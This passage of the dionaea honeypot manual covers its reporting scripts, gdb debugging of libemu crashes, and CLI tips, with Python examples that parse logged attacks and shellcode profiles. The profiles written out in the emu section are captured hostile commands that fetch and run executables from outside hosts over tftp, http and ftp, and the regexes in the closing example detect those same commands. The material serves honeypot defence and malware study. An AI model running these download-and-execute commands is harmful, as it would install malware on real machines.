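    db.execute("INSERT INTO dcerpcrequests VALUES (1,483256,?,31)", (SRVSVC,))
    db.execute("INSERT INTO offers VALUES (1,483256,'http://208.53.183.158/m.exe')")
    db.execute("INSERT INTO downloads VALUES (1,483256,'http://208.53.183.158/m.exe',"
               "'3eab379ddac7d80d3e38399fd273ddd4')")
    db.execute("INSERT INTO connections VALUES (1,'accept','tcp','httpd',?,"
               "'10.0.1.11',80,'198.51.100.7',4000)", (now - 3 * 86400,))
    return db


def attacks_since(db, since):
    """One record per connection newer than `since` (unix time) that issued a
    dcerpc request, with its offers and downloads attached."""
    report = []
    conns = db.execute(
        "SELECT connection, connection_timestamp, connection_protocol, "
        "connection_transport, connection_type, local_host, local_port, "
        "remote_host, remote_port FROM connections "
        "WHERE connection_timestamp >= ? ORDER BY connection_timestamp", (since,))
    for cid, ts, proto, transport, ctype, lh, lp, rh, rp in conns.fetchall():
        requests = db.execute("SELECT dcerpcrequest_uuid, dcerpcrequest_opnum FROM "
                              "dcerpcrequests WHERE connection=?", (cid,)).fetchall()
        if not requests:
            continue  # a bare connect without a request is a scan, not an attack
        offers = [u for (u,) in db.execute(
            "SELECT offer_url FROM offers WHERE connection=?", (cid,))]
        downloads = db.execute("SELECT download_md5_hash, download_url FROM "
                               "downloads WHERE connection=?", (cid,)).fetchall()
        report.append({"connection": cid, "timestamp": ts, "protocol": proto,
                       "transport": transport, "type": ctype, "requests": requests,
                       "local": "%s:%d" % (lh, lp), "remote": "%s:%d" % (rh, rp),
                       "offers": offers, "downloads": downloads})
    return report


def format_report(attacks):
    """Render the records in the indented style readlogsqltree prints."""
    lines = []
    for a in attacks:
        lines.append(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(a["timestamp"])))
        lines.append("  connection %d %s %s %s %s <- %s" % (
            a["connection"], a["protocol"], a["transport"], a["type"],
            a["local"], a["remote"]))
        for uuid, opnum in a["requests"]:
            lines.append("    dcerpc request: uuid '%s' opnum %d" % (uuid, opnum))
        for url in a["offers"]:
            lines.append("    offer: %s" % url)
        for md5, url in a["downloads"]:
            lines.append("    download: %s %s" % (md5, url))
    return "\n".join(lines)


if __name__ == "__main__":
    now = int(time.time())
    print(format_report(attacks_since(build_sample_db(now), now - 24 * 3600)))
```
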
          gnuplotsql - modules/python/gnuplotsql.py

       gnuplotsql is a very slow python3 script which runs some queries on the
       logsql sqlite database, creates graphs of the data with gnuplot, stores
       them on disk and creates an index of the data. The images are generated
       per protocol, for example an overview for dionaea's smbd. To create
       such images of your own data, run:

          ./gnuplotsql.py -d /var/lib/dionaea/logsql.sqlite -p smbd -p epmapper -p mssqld -p httpd -p ftpd

       The blog has some posts on gnuplotsql as well:

          · 2010-12-05 sudden death

          · 2010-10-01 Infosanity's Blog: gnuplotsql.py

          · 2010-09-19 gnuplotsql

          pg_backend - modules/python/xmpp/pg_backend.py

       pg_backend is the backend for logxmpp; currently it is a python2.x
       script which uses pyxmpp to access the xmpp service. It parses the
       messages received and can store the events in a postgres database and
       the received files on disk. pg_backend requires an xmpp account.

       Without a database:

          ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -f /tmp/

       With a database, first create the database:

          psql ...

       then start the backend:

          ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -s DBHOST -u DBUSER -d xmpp -p DBPASS -f /tmp/


SEGFAULT

       In case you experience a segfault, you will see something like this:

       This is the end.  This software just had a segmentation fault.  The bug
       you encountered may even be exploitable.  If you want to assist in
       fixing the bug, please send the backtrace below to nepenthesdev@gmail.com.
       You can create better backtraces with gdb, for more information visit
       http://dionaea.carnivore.it/#segfault Once you read this message, your
       tty may be broken, simply type reset, so it will come to life again:

          /opt/dionaea/bin/dionaea(sigsegv_backtrace_cb+0x20)[0x805c11e]
          [0x70d420]
          /opt/dionaea/lib/libemu/libemu.so.2(emu_env_w32_eip_check+0x94)[0x186974]
          /opt/dionaea/lib/dionaea/emu.so(run+0x39)[0x89cced]
          /opt/dionaea/lib/dionaea/emu.so(profile+0xbb)[0x89db88]
          /opt/dionaea/lib/dionaea/emu.so(proc_emu_on_io_in+0x1e1)[0x89bfc5]
          /opt/dionaea/bin/dionaea(recurse_io_process+0x31)[0x805df4a]
          /opt/dionaea/bin/dionaea(processors_io_in_thread+0x85)[0x805e08d]
          /opt/dionaea/bin/dionaea(threadpool_wrapper+0x2e)[0x805c99a]
          /opt/dionaea/lib/libglib-2.0.so.0[0xaa9498]
          /opt/dionaea/lib/libglib-2.0.so.0[0xaa7a2f]
          /lib/libpthread.so.0[0xd8973b]
          /lib/libc.so.6(clone+0x5e)[0x2b3cfe]

       While the backtrace itself gives an idea of what might be wrong, it
       does not fix the problem. To fix the problem, the logfiles usually help,
       as dionaea is very verbose by default. Below are some hints on how to
       get started with debugging; see the support section for assistance.

       debugging


VALGRIND

       Valgrind does a great job; here is how I use it:

          valgrind -v --leak-check=full --leak-resolution=high --show-reachable=yes \
           --log-file=dionaea-debug.log /opt/dionaea/bin/dionaea --my-dionaea-options


          gdb


          logfile assisted

       For the above example, I was able to scrape the shellcode from the
       logfile and run it in libemu's sctest without involving dionaea at all,
       which reduces the problem:

          gdb /opt/dionaea/bin/sctest
          (gdb) run -S -s 10000000 -g < sc.bin
          Starting program: /media/sda4/opt64/dionaea/bin/sctest -S -s 10000000 -g < sc.bin

       Once it crashed, I retrieved a full backtrace:

          Program received signal SIGSEGV, Segmentation fault.
          env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
          545                             struct emu_env_hook *hook = (struct emu_env_hook *)ehi->value;

          (gdb) bt full
          #0  env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
                  dll = 0x6366f0
                  ehi = <value optimized out>
                  hook = <value optimized out>
                  c = 0x611180
                  mem = <value optimized out>
                  eip_save = <value optimized out>
                  module = 2088763392
                  p_procname = 4289925
                  procname = <value optimized out>
          #1  0x00007ffff7b884fb in emu_env_w32_eip_check (env=0x629a30) at environment/win32/emu_env_w32.c:306
                  dll = <value optimized out>
                  ehi = <value optimized out>
                  hook = 0x64c5b0
                  eip = <value optimized out>
          #2  0x0000000000403995 in test (e=0x60f0e0) at sctestmain.c:277
                  hook = 0xe2
                  ev = 0x0
                  iv = <value optimized out>
                  cpu = 0x611180
                  mem = <value optimized out>
                  env = 0x629a30
                  na = <value optimized out>
                  j = 7169
                  last_vertex = 0x0
                  graph = 0x0
                  eh = 0x0
                  ehi = 0x0
                  ret = <value optimized out>
                  eipsave = 2088807840
          #3  0x00000000004044e4 in main (argc=5, argv=0x7fffffffe388) at sctestmain.c:971
                  e = <value optimized out>

       In this case, the problem was a bug in libemu.

          gdb dump memory

       Once again, it broke, and we got a backtrace:

          #0  0xb70b0b57 in emu_queue_enqueue (eq=0xb3da0918, data=0x4724ab) at emu_queue.c:63
                  eqi = (struct emu_queue_item *) 0x0
          #1  0xb70b15d1 in emu_shellcode_run_and_track (e=0xb4109cd0, data=0xb411c698 "", datasize=<value optimized out>, eipoffset=<value optimized out>,
                  steps=256, etas=0xb410cd60, known_positions=0xb3d7a810, stats_tested_positions_list=0xb3da3bf0, brute_force=true) at emu_shellcode.c:408
                  current_pos_ti_diff = (struct emu_tracking_info *) 0x88c3c88
                  current_pos_ht = <value optimized out>
                  current_pos_v = <value optimized out>
                  current_pos_satii = (struct emu_source_and_track_instr_info *) 0xb407e7f8
                  bfs_queue = (struct emu_queue *) 0xb3e17668
                  ret = 4662443
                  eipsave = <value optimized out>
                  hook = <value optimized out>
                  j = 4
                  es = <value optimized out>
                  eli = (struct emu_list_item *) 0xb3e17658
                  cpu = (struct emu_cpu *) 0xb4109ab0
                  mem = (struct emu_memory *) 0xb410c3a0
                  eq = (struct emu_queue *) 0xb3da0918
                  env = (struct emu_env *) 0xb3e10208
                  eli = (struct emu_list_item *) 0x4724ab
          #2  0xb70b1a2a in emu_shellcode_test (e=0xb4109cd0, data=0xb411c698 "", size=<value optimized out>) at emu_shellcode.c:546
                  es = (struct emu_stats *) 0xb3d92b28
                  new_results = (struct emu_list_root *) 0xb3da3bf0
                  offset = <value optimized out>
                  el = (struct emu_list_root *) 0xb4100510
                  etas = (struct emu_track_and_source *) 0xb410cd60
                  eh = (struct emu_hashtable *) 0xb3d7a810
                  eli = (struct emu_list_item *) 0xb3d92b40
                  results = (struct emu_list_root *) 0xb3d82850
                  es = <value optimized out>
                  __PRETTY_FUNCTION__ = "emu_shellcode_test"
          #3  0xb712140c in proc_emu_on_io_in (con=0x8864b58, pd=0x87dc388) at detect.c:145
                  e = (struct emu *) 0xb4109cd0
                  ctx = (struct emu_ctx *) 0x87a2400
                  offset = 14356
                  streamdata = (void *) 0xb411c698
                  size = 8196
                  ret = 0
                  __PRETTY_FUNCTION__ = "proc_emu_on_io_in"
          #4  0x0805e8be in recurse_io_process (pd=0x87dc388, con=0x8864b58, dir=bistream_in) at processor.c:167
          No locals.
          #5  0x0805ea01 in processors_io_in_thread (data=0x8864b58, userdata=0x87dc388) at processor.c:197
                  con = (struct connection *) 0x8864b58
                  pd = (struct processor_data *) 0x87dc388
                  __PRETTY_FUNCTION__ = "processors_io_in_thread"
          #6  0x0805d2da in threadpool_wrapper (data=0x87d7bd0, user_data=0x0) at threads.c:49
                  t = (struct thread *) 0x87d7bd0
                  timer = (GTimer *) 0xb4108540
          #7  0xb77441f6 in g_thread_pool_thread_proxy (data=0x83db460) at gthreadpool.c:265
                  task = (gpointer) 0x87d7bd0
                  pool = (GRealThreadPool *) 0x83db460
          #8  0xb7742b8f in g_thread_create_proxy (data=0x83dc7d0) at gthread.c:635
                  __PRETTY_FUNCTION__ = "g_thread_create_proxy"
          #9  0xb76744c0 in start_thread () from /lib/i686/cmov/libpthread.so.0
          No symbol table info available.
          #10 0xb75f36de in clone () from /lib/i686/cmov/libc.so.6
          No symbol table info available.

       Again, it was a bug in libemu: an endless loop consuming all memory. To
       reproduce it, we have to dump the tested buffer, so we need the
       buffer's address and size. Luckily the size is noted in the backtrace
       as 8196, and the data address is a parameter which did not get
       optimized out in frame #2:

          dump binary memory /tmp/sc.bin 0xb411c698 0xb411e89c

       Afterwards, debugging libemu by feeding the data into sctest is easy.

       I've had fun with objgraph and gdb debugging reference count leaks in
       python too; the writeup is at <http://carnivore.it/2009/12/23/arcane_bugs>.

          gdb python3 embedded

       Sometimes there is something wrong with the python scripts, but gdb
       does not provide any useful output:

          bt full
          #12 0xb765f12d in PyEval_EvalFrameEx (f=0x825998c, throwflag=0) at Python/ceval.c:2267
                  stack_pointer = (PyObject **) 0x8259af0
                  next_instr = (unsigned char *) 0x812fabf "m'"
                  opcode = 100
                  oparg = <value optimized out>
                  why = 3071731824
                  err = 1
                  x = (PyObject *) 0xb7244aac
                  v = <value optimized out>
                  w = (PyObject *) 0xadb5e4dc
                  u = (PyObject *) 0xb775ccb0
                  freevars = (PyObject **) 0x8259af0
                  retval = (PyObject *) 0x0
                  tstate = (PyThreadState *) 0x809aab0
                  co = (PyCodeObject *) 0xb717b800
                  instr_ub = -1
                  instr_lb = 0
                  instr_prev = -1
                  first_instr = (unsigned char *) 0x812f918 "t"
                  names = (PyObject *) 0xb723f50c
                  consts = (PyObject *) 0xb71c9f7c
                  opcode_targets = {0xb765d202, 0xb765f60a, 0xb766133a, 0xb76612db, 0xb7661285, 0xb7661222, 0xb765d202, 0xb765d202, 0xb765d202, 0xb76611dd,
            0xb766114b, 0xb76610b9, 0xb766100f, 0xb765d202, 0xb765d202, 0xb7660f7d, 0xb765d202, 0xb765d202, 0xb765d202, 0xb7660eb7, 0xb7660dfb, 0xb765d202,
            0xb7660d30, 0xb7660c65, 0xb7660ba9, 0xb7660aed, 0xb7660a31, 0xb7660975, 0xb76608b9, 0xb76607fd, 0xb765d202 <repeats 24 times>, 0xb7660736, 0xb766066b,
            0xb76605af, 0xb76604f3, 0xb765d202, 0xb7660437, 0xb766035d, 0xb76602ad, 0xb7661aba, 0xb76619fe, 0xb7661942, 0xb7661886, 0xb7661b76, 0xb76614a8,
            0xb7661413, 0xb766138e, 0xb766171f, 0xb76616e6, 0xb765d202, 0xb765d202, 0xb765d202, 0xb766162a, 0xb766156e, 0xb76601f1, 0xb7660135, 0xb76617ca,
            0xb7660120, 0xb765fff7, 0xb765d202, 0xb765fd72, 0xb765fc6e, 0xb765d202, 0xb765fc1d, 0xb765fe17, 0xb765fd90, 0xb765fec0, 0xb765fb41, 0xb765fadc,
            0xb765f9ed, 0xb765f94d, 0xb765f8be, 0xb765f7e3, 0xb765f779, 0xb765f6bd, 0xb765f66c, 0xb765ef1d, 0xb765eea2, 0xb765ede1, 0xb765ed1a, 0xb765ec35,
            0xb765ebc3, 0xb765eb30, 0xb765ea69, 0xb765f1c7, 0xb765f027, 0xb765f560, 0xb765efc1, 0xb76630e3, 0xb766310c, 0xb765e64c, 0xb765e592, 0xb765f49a,
            0xb765f3de, 0xb765d202, 0xb765d202, 0xb765f39e, 0xb7663135, 0xb766315f, 0xb765e9cb, 0xb765d202, 0xb765e948, 0xb765e8bb, 0xb765e817, 0xb765d202,
            0xb765d202, 0xb765d202, 0xb765d2ae, 0xb765e3e0, 0xb7663275, 0xb765e1a2, 0xb766324e, 0xb765e0ba, 0xb765e01e, 0xb765df74, 0xb765d202, 0xb765d202,
            0xb7663189, 0xb76631d3, 0xb7663220, 0xb765e149, 0xb765d202, 0xb765de09, 0xb765dec0, 0xb765f2c0, 0xb765d202 <repeats 108 times>}
          #13 0xb7664ac0 in PyEval_EvalCodeEx (co=0xb717b800, globals=0xb7160b54, locals=0x0, args=0x84babb8, argcount=9, kws=0x0, kwcount=0, defs=0xb719e978,
                  defcount=1, kwdefs=0x0, closure=0x0) at Python/ceval.c:3198
                  f = (PyFrameObject *) 0x825998c
                  retval = <value optimized out>
                  freevars = (PyObject **) 0x8259af0
                  tstate = (PyThreadState *) 0x809aab0
                  x = <value optimized out>
                  u = <value optimized out>

       Luckily python3 ships with some gdb macros which assist in dealing with
       this mess. You can grab them from
       <http://svn.python.org/view/python/tags/r311/Misc/gdbinit?view=markup>
       and place them in ~/.gdbinit, where ~ is the home directory of the user
       dionaea runs as. If you get "warning: not using untrusted file
       “/home/user/.gdbinit”", you are running gdb via sudo, and the file
       /home/user/.gdbinit has to be owned by root. If you are running as
       root, and you get "Program received signal SIGTTOU, Stopped (tty
       output).", run stty -tostop before running gdb, reattach the process
       with fg, close gdb properly, and start over.

       Once you got the macros loaded properly at gdb startup, set a
       breakpoint on PyEval_EvalFrameEx after dionaea has loaded everything:

          break PyEval_EvalFrameEx

       Then we have some useful macros for gdb:

          up
          pyframev

       pyframev combines the output of pyframe and pylocals.

       Be aware that you can now segfault dionaea from within gdb: going up,
       out of the python call stack, and calling some of the macros can and in
       most cases will segfault dionaea, therefore use backtrace to make sure
       you are still within valid frames. We can't use pystack or pystackv as
       they rely on Py_Main, which is an invalid assumption for embedded
       python.


TIPS AND TRICKS

       dionaea embeds a python interpreter and can therefore offer a python
       cli too. The python cli is blocking: if you start entering a command,
       the whole process will wait for you to finish it and will not accept
       any new connections. You can use the python cli to interact with
       dionaea, which is very useful for development and debugging.

   Configuration
       You can access the dionaea.conf via python (readonly):

          from dionaea import g_dionaea
          g_dionaea.config()

   Completion and History on the CLI
       If you use the cli often, you can make it behave like a real shell,
       including history and completion:

          import rlcompleter, readline
          readline.parse_and_bind('tab: complete')

   Triggering Downloads
       Sometimes it helps to trigger a download without waiting for an attack.
       This is very useful if you want to verify permissions are correct when
       switching the user, or to make sure a submission to a 3rd party works
       correctly. You can trigger downloads for all major protocols.

   ftp
          from dionaea.ftp import ftp
          f = ftp()
          f.download(None, 'anonymous','guest','ftp.kernel.org',21, 'welcome.msg', 'binary','ftp://ftp.kernel.org/welcome.msg')

   tftp
          from dionaea.tftp import TftpClient
          t = TftpClient()
          t.download(None, 'tftp.example.com', 69, 'filename')

   http
       As the http download is not done in python, we do not use the download
       facility directly, but create an incident, which will trigger the
       download:

          from dionaea.core import incident
          i = incident("dionaea.download.offer")
          i.set("url", "http://www.honeynet.org")
          i.report()

   incidents
       Incidents are the IPC mechanism used within dionaea.

   dumping
          from dionaea.core import ihandler

          class idumper(ihandler):
              def __init__(self, pattern):
                  ihandler.__init__(self, pattern)

              def handle(self, icd):
                  icd.dump()

          a = idumper('*')

   emu profile
       Small collection of various shellcode profiles gathered from dionaea.

   CreateProcess Commands
       This profile will trigger a download via tftp.

          p='[{"call": "CreateProcess", "args": ["", "tftp.exe -i 92.17.46.208 get ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "CreateProcess", "args": ["", "ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
          from dionaea.core import incident
          i = incident("dionaea.module.emu.profile")
          i.set("profile", str(p))
          i.report()

   URLDownloadToFile
       This profile will trigger a download.

          p='[{"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"}, {"call": "URLDownloadToFile", "args": ["", "http://82.165.32.34/compiled.exe", "47.scr", "0", "0"], "return": "0"}, {"call": "WinExec", "args": ["47.scr", "895"], "return": "32"}]'
          from dionaea.core import incident
          i = incident("dionaea.module.emu.profile")
          i.set("profile", str(p))
          i.report()

   WinExec Commands
       This profile uses WinExec to create a command file for the windows ftp
       client, downloads a file, and executes the file:

          p='[{"call": "WinExec", "args": ["cmd /c echo open welovewarez.com 21 > i&echo user wat l0l1 >> i &echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i &SCUM.EXE\\r\\n", "0"], "return": "32"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
          from dionaea.core import incident
          i = incident("dionaea.module.emu.profile")
          i.set("profile", str(p))
          i.report()

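       What the emu module does with such a profile is pull the download
       offers out of the recorded API calls. The following is an added
       example, not dionaea's own profile handler: it walks the three profiles
       above (the CreateProcess one trimmed to its first arguments) and
       extracts the http, tftp and ftp transfers with regexes of my own.

```python
"""Added example, not dionaea's own emu profile handler: pull the download
offers out of a libemu shellcode profile (the JSON call list shown above)."""
import json
import re

# The three profiles from the text; the CreateProcess one is trimmed to the
# arguments that matter (lpCommandLine is args[1]).
PROFILE_URLDOWNLOAD = (
    '[{"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"}, '
    '{"call": "URLDownloadToFile", "args": ["", "http://82.165.32.34/compiled.exe", '
    '"47.scr", "0", "0"], "return": "0"}, '
    '{"call": "WinExec", "args": ["47.scr", "895"], "return": "32"}]')
PROFILE_TFTP = (
    '[{"call": "CreateProcess", "args": ["", "tftp.exe -i 92.17.46.208 get ssms.exe", '
    '"", "", "1", "40", "", ""], "return": "-1"}, '
    '{"call": "CreateProcess", "args": ["", "ssms.exe", "", "", "1", "40", "", ""], '
    '"return": "-1"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]')
PROFILE_FTP = (
    '[{"call": "WinExec", "args": ["cmd /c echo open welovewarez.com 21 > i&echo user '
    'wat l0l1 >> i &echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i &SCUM.EXE\\r\\n", '
    '"0"], "return": "32"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]')

# Heuristics of my own for the two command-line download idioms seen above.
TFTP_RE = re.compile(r"tftp(?:\.exe)?\s+-i\s+(\S+)\s+get\s+(\S+)", re.I)
FTP_OPEN_RE = re.compile(r"echo\s+open\s+(\S+)(?:\s+(\d+))?", re.I)
FTP_USER_RE = re.compile(r"echo\s+user\s+(\S+)\s+(\S+)", re.I)
FTP_GET_RE = re.compile(r"echo\s+get\s+(\S+)", re.I)


def offers_from_command(cmd):
    """Transfers hidden in a command line passed to CreateProcess/WinExec."""
    found = []
    m = TFTP_RE.search(cmd)
    if m:
        found.append({"proto": "tftp", "url": "tftp://%s/%s" % m.groups()})
    o = FTP_OPEN_RE.search(cmd)
    if o:
        host, port = o.group(1), o.group(2) or "21"
        u = FTP_USER_RE.search(cmd)
        user, password = u.groups() if u else ("anonymous", "guest")
        for g in FTP_GET_RE.finditer(cmd):  # one offer per file fetched
            found.append({"proto": "ftp", "url": "ftp://%s:%s@%s:%s/%s"
                          % (user, password, host, port, g.group(1))})
    return found


def offers_from_profile(profile_json):
    """Walk the recorded API calls and collect every file the shellcode
    would have fetched; dionaea raises a dionaea.download.offer per entry."""
    offers = []
    for call in json.loads(profile_json):
        name, args = call.get("call"), call.get("args", [])
        if name == "URLDownloadToFile" and len(args) > 1:
            offers.append({"proto": "http", "url": args[1]})    # szURL
        elif name == "CreateProcess" and len(args) > 1:
            offers.extend(offers_from_command(args[1]))         # lpCommandLine
        elif name == "WinExec" and args:
            offers.extend(offers_from_command(args[0]))         # lpCmdLine
    return offers


if __name__ == "__main__":
    for p in (PROFILE_URLDOWNLOAD, PROFILE_TFTP, PROFILE_FTP):
        print(offers_from_profile(p))
```
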

AUTHOR

       dionaea

       2015, dionaea



0.7.0                            Jan 31, 2019                       DIONAEA(1)